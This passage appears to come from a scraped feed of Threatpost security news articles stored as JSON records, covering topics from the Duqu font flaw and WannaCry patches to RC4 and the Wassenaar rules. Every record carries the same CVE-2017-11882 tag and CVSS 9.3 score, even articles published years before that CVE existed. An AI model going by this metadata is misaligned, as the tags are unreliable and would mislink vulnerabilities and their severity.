[CanSecWest](<http://cansecwest.com/index.html>) is March 7-9 this year in Vancouver.\n", "cvss3": {}, "published": "2012-01-23T20:00:06", "type": "threatpost", "title": "Revamped Pwn2Own to Offer $105K in Prizes, Cash From Google for Chrome 0-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:57", "id": "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "href": "https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/76128/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:02", "description": "A few days after Microsoft released a patch to fix a vulnerability in ASP.NET that could enable a denial-of-service attack, someone has released exploit code for the vulnerability. \n\nThe proof-of-concept [exploit code](<https://github.com/HybrisDisaster/aspHashDoS>) was posted to the Full Disclosure mailing list and is available for download from GitHub. Posted by a user named HybrisDisaster, the code is designed to exploit a recently discovered vulnerability in ASP.NET that\u2019s related to the way that the software handles certain HTTP POST requests. The vulnerability was first disclosed in late December at the Chaos Communications Congress in Germany.\n\nThe problem isn\u2019t actually specific to ASP.NET, but affects a variety of languages and applications. Microsoft shipped an emergency patch for the flaw on Dec. 29, recommending that users install it as quickly as possible.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. 
An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\nThe root cause of the problem is that when ASP.NET comes across a form submission with some specific characteristics, it needs to perform a huge amount of computation that can consume all of the server\u2019s resources.\n", "cvss3": {}, "published": "2012-01-09T16:00:19", "type": "threatpost", "title": "Exploit Code Released for ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:D58796CB8261B361ADF389131F955AE3", "href": "https://threatpost.com/exploit-code-released-aspnet-flaw-010912/76073/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, or the Dynamic Host Configuration Profile, automates the assignment of IP addresses and configuration information to IP hosts. 
It\u2019s used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, but the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workarounds available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. 
But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft, like nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long-term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). 
The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yandex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home page will be changed.\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains for the new start pages, as well as the domains hosting the malicious Flash update, were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. 
Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy settings for the next version of their search engine. Currently the site strips SSL when forced into HTTPS and, in turn, brings up an advisory on browsers signaling an unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>) allows attackers to capture site cookies from users on unsecured wireless networks and browse under their logon. \n\nWith the advent of Firesheep and, subsequently, its surge of recently converted hackers, HTTP session hijacking is becoming more and more of a concern. Sites like Bing will have to adopt suitable security techniques to contend with the extension\u2019s further proliferation. \n\nFirefox 4, scheduled for release by the end of the year, will help. [As reported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport Security, ensuring the browser always requests a safe HTTPS session from sites. 
However, if sites like Bing don\u2019t implement SSL, the lack of end-to-end encryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network World has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "Dennis Fisher talks with Adam Shostack of Microsoft about the taxonomy he helped develop for classifying how PCs are compromised, what he would and wouldn\u2019t change in The New School of Information Security and who he\u2019s learned the most from.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\nImage via [adamshostack](<http://www.flickr.com/photos/adamshostack/7308776486/in/photolist-c8RoBG/lightbox/>)\u2018s Flickr photostream, Creative Commons\n", "cvss3": {}, "published": "2011-12-12T15:12:45", "type": "threatpost", "title": "Adam Shostack on Methods of Compromise, the New School and Learning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:46:17", "id": "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "href": "https://threatpost.com/adam-shostack-methods-compromise-new-school-and-learning-121211/75984/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November Patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually (denying the Everyone group access to the t2embed.dll font-embedding library), users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType 
font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:18", "description": "[From CIO (Robert 
McMillan)](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>)\n\nCorporate IT staffers will get a double whammy next week, as both [Microsoft and Oracle are set to release critical security updates](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>) [cio.com] on the same day, including a likely fix for an Excel bug that has been used by cybercriminals.\n\nThis month, Oracle\u2019s quarterly software fixes and Microsoft\u2019s monthly patches happen to fall on the same day, next Tuesday. For Windows users, there will be a lot to patch. Microsoft plans to release [eight updates in total](<http://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx>) [microsoft.com]: Five of them are for Windows, with a single update each for Internet Explorer, Excel and Microsoft\u2019s Internet Security and Acceleration (ISA) server. [Read the full story](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>). More from [ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3116>) [zdnet.com]\n", "cvss3": {}, "published": "2009-04-09T20:27:27", "type": "threatpost", "title": "After attacks, Microsoft readies security patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:26", "id": "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "href": "https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/72521/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "Even for the most experienced security professionals, understanding complex attacks and vulnerabilities sometimes can be a serious challenge. A perfect example is the recent Microsoft IIS WebDAV vulnerability, which surfaced last week and has yet to be patched by Microsoft. 
It\u2019s a complicated issue, which some experts say was made more so by the guidance that the software maker released about it. Luckily, [Steve Friedl of Unixwiz.net](<http://unixwiz.net/techtips/ms971492-webdav-vuln.html>) has taken the time to make some sense of it all.\n\nFriedl, a security consultant, put together a flowchart that helps administrators figure out whether their Web servers are vulnerable. His key piece of advice is, if you\u2019re not sure whether your servers are at risk, find an expert who can test your machines and give you a definitive answer.\n\nThe vulnerability allows a remote anonymous user to bypass authentication checks and access the system in ways not intended for anonymous users: systems **are** getting hacked with this, and it\u2019s important to assess your local security posture and take steps to mitigate exposures that are discovered.\n\nMicrosoft published information on this in their [Security Advisory (971492)](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), but we found their guidance confusing for users who were not IIS experts. While researching what each of the pieces meant, we decided to create this Tech Tip with a simple flowchart that will help rapidly get to the \u201cnot vulnerable\u201d stage if that\u2019s indeed the case.\n\nMost systems are likely not vulnerable, but unless the flowchart below leads to \u201cYou are not vulnerable\u201d, we strongly recommend seeking local expertise to help assess your situation properly.\n\nAs Friedl and others have noted, attackers are actively exploiting the IIS WebDAV vulnerability, and as there\u2019s no patch available yet, it\u2019s vital that enterprises take a close look at their Web servers to see whether they\u2019re vulnerable. 
Microsoft officials have said they\u2019re investigating the vulnerability and it would not be surprising to see an out-of-band patch for IIS, given the seriousness of the problem.\n", "cvss3": {}, "published": "2009-05-28T14:11:35", "type": "threatpost", "title": "A guide to the IIS WebDAV vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "href": "https://threatpost.com/guide-iis-webdav-vulnerability-052809/72745/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. 
[Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com]. Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com].\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. 
Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. Many companies would be forced to request export licenses to carry out certain research activities, something that many security officials believe would work against the idea of information sharing.\n\nThe debate has been largely one-sided. 
Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. 
Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. 
Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. 
Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET do the same, through modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. 
Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. 
As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. 
Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. 
